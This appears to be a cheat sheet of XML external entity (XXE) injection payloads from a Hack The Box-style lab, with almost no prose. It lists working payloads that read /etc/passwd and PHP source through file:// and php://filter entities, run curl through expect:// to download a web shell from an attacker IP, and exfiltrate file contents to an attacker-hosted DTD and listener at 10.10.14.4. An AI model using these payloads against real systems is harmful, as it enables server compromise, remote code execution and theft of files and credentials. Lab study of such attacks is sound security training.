XXE
LFI
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
LFI Encoded
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
RCE
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
CDATA Exfiltration
enyei@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
enyei@htb[/htb]$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (<http://0.0.0.0:8000/>) ...
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
<root>
<name></name>
<tel></tel>
<email>&joined;</email>
<message></message>
</root>
Error Based XXE
Host this external dtd on our server
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % oob "<!ENTITY % content SYSTEM 'http://10.10.14.4:4444/?content=%file;'>">
%oob;
%content;<?xml version="1.0"?>
<!DOCTYPE email [<!ENTITY % remote SYSTEM "http://10.10.14.4:4444/xxe.dtd"> %remote;]>
<root>
<name></name>
<tel></tel>
<email>&content;</email>
<message></message>
</root>
Last updated